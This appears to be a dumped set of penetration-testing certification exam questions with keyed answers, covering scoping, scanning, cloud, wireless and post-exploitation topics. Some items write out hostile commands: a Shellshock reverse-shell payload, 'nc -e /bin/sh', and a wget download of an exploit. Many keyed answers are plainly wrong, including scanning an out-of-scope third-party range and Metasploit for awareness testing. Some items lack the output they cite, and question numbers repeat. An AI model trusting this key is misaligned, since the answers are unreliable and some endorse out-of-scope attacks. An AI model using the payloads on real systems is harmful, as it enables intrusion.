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NEW QUESTION 1
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing
data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-
serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manage/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.

Answer: D

NEW QUESTION 2
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following
code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
B. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
C. exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}
D. exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Answer: D

NEW QUESTION 3
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A. NDA
B. MSA
C. SOW
D. MOU

Answer: C

NEW QUESTION 4
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to
delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept
exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which
of the following concerns would BEST support the software company’s request?

A. The reverse-engineering team may have a history of selling exploits to third parties.
B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D. The reverse-engineering team will be given access to source code for analysis.

Answer: A

NEW QUESTION 5
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose
two.)

A. Open-source research
B. A ping sweep
C. Traffic sniffing
D. Port knocking
E. A vulnerability scan
F. An Nmap scan

Answer: AC

NEW QUESTION 6
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the
assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE
the start of the assessment?

A. A signed statement of work
B. The correct user accounts and associated passwords
C. The expected time frame of the assessment
D. The proper emergency contacts for the client

Answer: B

NEW QUESTION 7
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following
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should the penetration tester do NEXT?

A. Forensically acquire the backdoor Trojan and perform attribution
B. Utilize the backdoor in support of the engagement
C. Continue the engagement and include the backdoor finding in the final report
D. Inform the customer immediately about the backdoor

Answer: D

NEW QUESTION 8
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-
on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.

Answer: D

NEW QUESTION 9
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will
perform the scan?

A. nmap –vv sUV –p 53, 123-159 10.10.1.20/24 –oA udpscan
B. nmap –vv sUV –p 53,123,161-162 10.10.1.20/24 –oA udpscan
C. nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan
D. nmap –vv sUV –p 53, 122-123, 160-161 10.10.1.20/24 –oA udpscan

Answer: B

NEW QUESTION 10
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords

Answer: A

NEW QUESTION 10
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A. Analyze the malware to see what it does.
B. Collect the proper evidence and then remove the malware.
C. Do a root-cause analysis to find out how the malware got in.
D. Remove the malware immediately.
E. Stop the assessment and inform the emergency contact.

Answer: E

NEW QUESTION 12
A penetration tester runs a scan against a server and obtains the following output: 21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2012 Std 3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest
C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23
D. curl –X TRACE https://192.168.53.23:8443/index.aspx
E. nmap –-script vuln –sV 192.168.53.23
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Answer: A

NEW QUESTION 15
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company’s employees.
Which of the following tools can help the tester achieve this goal?

A. Metasploit
B. Hydra
C. SET
D. WPScan

Answer: A

NEW QUESTION 16
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through
this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A. Edit the discovered file with one line of code for remote callback
B. Download .pl files and look for usernames and passwords
C. Edit the smb.conf file and upload it to the server
D. Download the smb.conf file and look at configurations

Answer: C

NEW QUESTION 18
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of
access of the existing user?

A. iam_enum_permissions
B. iam_privesc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions

Answer: A

NEW QUESTION 22
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus

Answer: B

NEW QUESTION 23
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques
would BEST support this objective?

A. Create a one-shot systemd service to establish a reverse shell.
B. Obtain /etc/shadow and brute force the root password.
C. Run the nc -e /bin/sh <...> command.
D. Move laterally to create a user account on LDAP

Answer: A

Explanation: 
https://hosakacorp.net/p/systemd-user.html
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NEW QUESTION 26
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
• The following request was intercepted going to the network device: GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
• Network management interfaces are available on the production network.
• An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.

Answer: CE

NEW QUESTION 27
Appending string values onto another string is called:

A. compilation
B. connection
C. concatenation
D. conjunction

Answer: C

NEW QUESTION 28
Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

A. NIST SP 800-53
B. OWASP Top 10
C. MITRE ATT&CK framework
D. PTES technical guidelines

Answer: C

NEW QUESTION 30
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit
online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

A. ROE
B. SLA
C. MSA
D. NDA

Answer: D

NEW QUESTION 31
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance
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identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Answer: C

NEW QUESTION 35
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning
the penetration testing activities?

A. Clarify the statement of work.
B. Obtain an asset inventory from the client.
C. Interview all stakeholders.
D. Identify all third parties involved.

Answer: A

NEW QUESTION 40
A penetration tester ran an Nmap scan on an Internet-facing network device with the –F option and found a few open ports. To further enumerate, the tester ran
another scan using the following command:
nmap –O –A –sS –p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.

Answer: A

NEW QUESTION 42
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete
the scan of the system?

A. Weekly
B. Monthly
C. Quarterly
D. Annually

Answer: A

NEW QUESTION 45
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the
following algorithms was MOST likely used to store the passwords in the database?

A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2

Answer: A

NEW QUESTION 48
Running a vulnerability scanner on a hybrid network segment that includes general IT servers and industrial control systems:

A. will reveal vulnerabilities in the Modbus protocol.
B. may cause unintended failures in control systems.
C. may reduce the true positive rate of findings.
D. will create a denial-of-service condition on the IP networks.

Answer: B

NEW QUESTION 49
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched
version of Apache. Which of the following commands will accomplish this task?

A. nmap –f –sV –p80 192.168.1.20
B. nmap –sS –sL –p80 192.168.1.20
C. nmap –A –T4 –p80 192.168.1.20
D. nmap –O –v –p80 192.168.1.20

Answer: C
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NEW QUESTION 53
A compliance-based penetration test is primarily concerned with:

A. obtaining Pll from the protected network.
B. bypassing protection on edge devices.
C. determining the efficacy of a specific set of security standards.
D. obtaining specific information from the protected network.

Answer: C

NEW QUESTION 56
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over
time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-
engineering attacks was the tester utilizing?

A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing

Answer: C

NEW QUESTION 61
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A. Buffer overflows
B. Cross-site scripting
C. Race-condition attacks
D. Zero-day attacks
E. Injection flaws
F. Ransomware attacks

Answer: BE

Explanation: 

A01-Injection
A02-Broken Authentication A03-Sensitive Data Exposure A04-XXE
A05-Broken Access Control A06-Security Misconfiguration A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities A10-Insufficient Logging & Monitoring

NEW QUESTION 63
A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does
exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration
tester MOST likely implement?

A. Direct-to-origin
B. Cross-site scripting
C. Malware injection
D. Credential harvesting

Answer: A

NEW QUESTION 67
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel

Answer: A

NEW QUESTION 70
A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools
can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

A. Immunity Debugger
B. OllyDbg
C. GDB
D. Drozer

Answer: B

NEW QUESTION 73
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Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws

Answer: A

NEW QUESTION 75
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target
enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP. Which of the following steps should the
tester take NEXT?

A. Send deauthentication frames to the stations.
B. Perform jamming on all 2.4GHz and 5GHz channels.
C. Set the malicious AP to broadcast within dynamic frequency selection channels.
D. Modify the malicious AP configuration to not use a pre-shared key.

Answer: A

NEW QUESTION 76
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester
compromised?

A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system

Answer: B

NEW QUESTION 78
A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no
authentication requirements. Which of the following settings in Shodan would meet the client’s requirements?

A. “cisco-ios” “admin+1234”
B. “cisco-ios” “no-password”
C. “cisco-ios” “default-passwords”
D. “cisco-ios” “last-modified”

Answer: A

NEW QUESTION 83
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the
following should the tester do with this information to make this a successful exploit?

A. Perform XSS.
B. Conduct a watering-hole attack.
C. Use BeEF.
D. Use browser autopwn.

Answer: A

NEW QUESTION 87
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies
the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A. Hydra and crunch
B. Netcat and cURL
C. Burp Suite and DIRB
D. Nmap and OWASP ZAP

Answer: C

NEW QUESTION 92
A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

A. nc 10.10.51.50 9891 < exploit
B. powershell –exec bypass –f \\10.10.51.50\9891
C. bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
D. wget 10.10.51.50:9891/exploit
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Answer: D

NEW QUESTION 94
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past
several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is
very good. Which of the following recommendations should the penetration tester include in the report?

A. Add a dependency checker into the tool chain.
B. Perform routine static and dynamic analysis of committed code.
C. Validate API security settings before deployment.
D. Perform fuzz testing of compiled binaries.

Answer: D

NEW QUESTION 97
......
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